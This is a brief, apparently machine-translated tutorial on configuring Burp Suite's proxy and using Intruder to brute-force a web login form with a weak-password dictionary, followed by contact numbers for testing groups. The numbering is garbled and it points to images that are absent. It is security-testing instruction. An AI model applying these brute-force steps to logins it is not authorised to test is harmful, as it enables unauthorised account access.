burp, known as Burp Suite, is an integrated platform for attacking web applications. It contains a number of tools that can capture packets, blast or scan for vulnerabilities.
The main components are listed below:
2: We turn on the browser proxy
3: Configure the burp proxy ip, pay attention to be consistent with the browser proxy ip
3: Proxy all open, now we are on the login port to capture packets. Fill in your login name and password, click login, and observe the http requests intercepted by burp.
On the intercepted request page, right-click send to intruder
Now let's click on the intruder button and then click on POSITIONS and observe the page. The places where we typed $$$ have become variables
Now let's empty the page of variables and only make variables where we need them
take note of attack type Here we only make variables for username.
After the parameters are made variables, the page clicksFor payloads, scroll down and select runtime file or per list, then click load to load the weak password dictionary.
Load the weak password dictionary. A weak password dictionary is a character set consisting of many simple characters, as follows
Loading a weak password file
Click start attack under intruder to start blasting, and observe the results.
We did a sort on the length of the blast results and found the two most unusual sets of characters
A quick trip to the login port with these two sets of characters verified that we were successfully logged in
Here it is necessary to remind, if the total number of weak passwords is a lot, then the waiting time will be very long, you need to be patient.
Beijing Software Testing QQ1 Group:507088
Beijing Software Testing Group:450569
Beijing Software Testing QQ2 Group:132142000